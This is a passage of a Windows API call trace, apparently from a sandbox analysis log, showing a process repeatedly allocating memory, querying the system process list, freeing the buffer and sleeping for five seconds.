SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.205] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.212] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.219] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.225] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.232] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.239] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.246] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.259] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.310] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.333] 